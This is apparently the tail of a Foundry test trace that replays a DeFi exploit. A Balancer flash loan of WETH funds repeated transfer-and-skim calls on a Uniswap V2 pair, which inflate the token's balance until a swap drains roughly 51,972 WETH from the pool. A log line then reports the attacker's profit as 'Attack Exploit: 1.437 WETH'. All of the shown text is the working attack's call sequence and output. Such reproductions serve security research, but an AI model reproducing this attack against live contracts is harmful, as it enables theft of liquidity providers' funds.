    │   │   │   ├─ [5747] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 71537922181095525778 [7.153e19])
    │   │   │   │   ├─  emit topic 0: 0x57e1b125fcc61a64af71b7ebc1a263c826a564f77e786c6993ed677863a0dd9c
    │   │   │   │   │        topic 1: 0x0000000000000000000000002033b54b6789a963a02bfcbd40a46816770f1161
    │   │   │   │   │           data: 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000003cb71f51fc5580000 → 0x000000000000000000000000000000000000000000000004563918244f400000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 51972321521432081735476 [5.197e22]
    │   │   │   ├─ [3262] WETH::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 0)
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000003cb71f51fc5580000 → 0x000000000000000000000000000000000000000000000004563918244f400000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [18991] Uniswap V2: pEth::skim(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161])
    │   │   │   ├─ [2589] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 81537965509184617860 [8.153e19]
    │   │   │   ├─ [5747] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 81537922181095525778 [8.153e19])
    │   │   │   │   ├─  emit topic 0: 0x57e1b125fcc61a64af71b7ebc1a263c826a564f77e786c6993ed677863a0dd9c
    │   │   │   │   │        topic 1: 0x0000000000000000000000002033b54b6789a963a02bfcbd40a46816770f1161
    │   │   │   │   │           data: 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000004563918244f400000 → 0x000000000000000000000000000000000000000000000004e1003b28d9280000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 51972321521432081735476 [5.197e22]
    │   │   │   ├─ [3262] WETH::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 0)
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000004563918244f400000 → 0x000000000000000000000000000000000000000000000004e1003b28d9280000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [18991] Uniswap V2: pEth::skim(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161])
    │   │   │   ├─ [2589] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 91537965509184617860 [9.153e19]
    │   │   │   ├─ [5747] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 91537922181095525778 [9.153e19])
    │   │   │   │   ├─  emit topic 0: 0x57e1b125fcc61a64af71b7ebc1a263c826a564f77e786c6993ed677863a0dd9c
    │   │   │   │   │        topic 1: 0x0000000000000000000000002033b54b6789a963a02bfcbd40a46816770f1161
    │   │   │   │   │           data: 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000004e1003b28d9280000 → 0x0000000000000000000000000000000000000000000000056bc75e2d63100000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 51972321521432081735476 [5.197e22]
    │   │   │   ├─ [3262] WETH::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 0)
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000004e1003b28d9280000 → 0x0000000000000000000000000000000000000000000000056bc75e2d63100000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [1831] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [56842] Uniswap V2: Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(0, 0, [0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ [7147] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 0)
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [504] Uniswap V2: pEth::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 43328089092082 [4.332e13], 51972321521432081735476 [5.197e22], 1696760447 [1.696e9]
    │   │   │   ├─ [2589] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 101537965509184617860 [1.015e20]
    │   │   │   ├─ [38392] Uniswap V2: pEth::swap(0, 51972299277168324394969 [5.197e22], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [23162] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 51972299277168324394969 [5.197e22])
    │   │   │   │   │   ├─ emit Transfer(from: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 51972299277168324394969 [5.197e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000b016c8a8f8aa4ec3fd9
    │   │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000b016cd99694e4781f34 → 0x000000000000000000000000000000000000000000000000004f070a3f8bdf5b
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [2589] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 101537965509184617860 [1.015e20]
    │   │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 22244263757340507 [2.224e16]
    │   │   │   │   ├─ emit Sync(reserve0: 101537965509184617860 [1.015e20], reserve1: 22244263757340507 [2.224e16])
    │   │   │   │   ├─ emit Swap(sender: Uniswap V2: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 101537922181095525778 [1.015e20], amount1In: 0, amount0Out: 0, amount1Out: 51972299277168324394969 [5.197e22], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x6522827f000000000b016cd99694e4781f34000000000000000027681b5beff2 → 0x6522827f000000000000004f070a3f8bdf5b000000000005811f51a8ced07d84
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 51972299277168324394969 [5.197e22]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] WETH::transfer(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 51970861731879316502999 [5.197e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], value: 51970861731879316502999 [5.197e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000b016c8a8f8aa4ec3fd9 → 0x00000000000000000000000000000000000000000000000013f32fd2ebda0602
    │   │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0 → 0x000000000000000000000000000000000000000000000b0158975fb7b91239d7
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x409f130c2d24c25c4bcadf8514a091a83625fb147a2fe4744d54b7a17f1c5cb3: 0x000000000000000000000000000000000000000000000000000027681b5beff2 → 0x0000000000000000000000000000000000000000000000001557f37b6bc07d84
    │   │   │   @ 12: 0 → 1
    │   │   └─ ← [Stop]
    │   ├─ [534] WETH::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 51970861731879316502999 [5.197e22]
    │   ├─ emit FlashLoan(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], param2: 51970861731879316502999 [5.197e22], param3: 0)
    │   └─ ← [Stop]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1437545289007891970 [1.437e18]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1437545289007891970 [1.437e18]
    ├─ [0] console::log("Attack Exploit: %s.%s WETH", 1, 437545289007891970 [4.375e17]) [staticcall]
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 0: 2 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.04s (7.76s CPU time)

Ran 2 test suites in 11.91s (11.53s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
